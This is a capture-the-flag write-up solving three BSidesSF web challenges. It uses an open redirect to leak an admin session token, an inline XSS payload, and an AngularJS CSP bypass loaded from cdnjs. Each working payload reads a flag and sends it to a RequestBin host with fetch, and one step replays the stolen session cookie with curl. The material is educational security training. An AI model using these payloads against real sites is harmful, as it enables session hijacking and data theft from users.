CuteSRV (101)
Last year was pretty tough for all of us.
I built this service of cute photos to help cheer you up.
We do moderate for cuteness, so no inappropriate photos please!
https://cutesrv-0186d981.challenges.bsidessf.net
(author: matir)
This challenge was fun, cute and straight-forward once the bug is found.
First we're presented with a page of cute photos and the nav bar allows us to
Login or Submit a new image for review.
Looking in the source, there's a /flag.txt route which must be the goal of
the challenge, but when visiting it we get a message 'Not Authorized'.
If we visit Login we can click the only link available and it will
automatically log us in and redirect us to the main page.
on /submit it gives us the ability to submit a URL which the admin will
visit. This is typical in a lot of CSRF challenges, so we can start by checking
the User-Agent and other features when it visits our link, pointing to a server
we own or using something like https://requestbin.io/.
Even if we find XSS, the site is using HttpOnly cookies, so we probably need to find something else.
Checking out the Login route again while watching the requests, it does
something interesting. When requesting /check from the login service it will
include the session token in the URL, but does not restrict which URL it
redirects to. Using this bug we can force the Admin user to send their own
session token to our site instead.
We can use RequestBin again to steal the session token authtok, submitting this link to the admin:
https://loginsvc-0af88b56.challenges.bsidessf.net/check?continue=https%3A%2F%2Frequestbin.io%2F1oar7lu1
Now we can reach the /flag.txt route which is only available to the admin:
curl https://cutesrv-0186d981.challenges.bsidessf.net/flag.txt \
-b 'loginsid=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhdXRodG9rIiwiZXhwIjoxNjE4NDYyMjkyLCJpYXQiOjE2MTU3ODM4OTIsImlzcyI6ImxvZ2luc3ZjIiwibmJmIjoxNjE1NzgzODkyLCJzdWIiOiJhZG1pbiJ9.iA3lgwhmhOPNKh0_Wxmi923EOWdcUWcS-cIA_lxPhtExEGMeGkep3zweJ-MXtFyOwiDnMZ7Uuyuth9mFQ0lpMQ'
And we get the Flag!
FLAG: CTF{i_hope_you_made_it_through_2020_okay}
CSP 1 (101)
Description:
CSP challenges are back! Can you bypass the CSP to steal the flag?
https://csp-1-581db2b1.challenges.bsidessf.net
(flag path: /csp-one-flag)
(author: itsc0rg1)
If we look at the Content Security Policy (CSP) for this page, we can see it's very open. To identify this, you can learn each rule or use a tool such as https://csp-evaluator.withgoogle.com/.
The CSP in this case was:
default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *
The unsafe-inline keyword will allow execution of arbitrary inline scripts.
Let's start with a simple XSS payload:
<img src=x onerror=alert(1) />
This already works! So now we only need to get the flag from the
/csp-one-flag route after the admin visits it. We can use fetch for this.
We'll also use https://requestbin.io/ again.
Here's the final payload submitted to the admin:
<img src=x onerror='fetch("/csp-one-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/yj1y96yj?x=" + t))' />
And we get a flag back on the RequestBin side:
CTF{Can_Send_Payloads}
CSP 2 (101)
Description:
CSP challenges are back! Can you bypass the CSP to steal the flag?
https://csp-2-f692634b.challenges.bsidessf.net
(flag path: /csp-two-flag)
(author: itsc0rg1)
This challenge was simmilar to the last one where we need to send an XSS payload to an admin to get the flag.
Checking the CSP this time we have:
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report
This one has the issue of using script-src from cdnjs.cloudflare.com. If we can
use a script from CloudFlare to execute arbitrary JS, we win!
To do this we can use Angular to evaluate JS within an Angular context. Here's a simple example to test:
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('alert(1)')()}}
This payload seems to work!
Now we just need to exfiltrate the flag like the last challenge using fetch.
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}
Then we get the Flag on RequestBin:
CTF{Can_Still_Pwn}
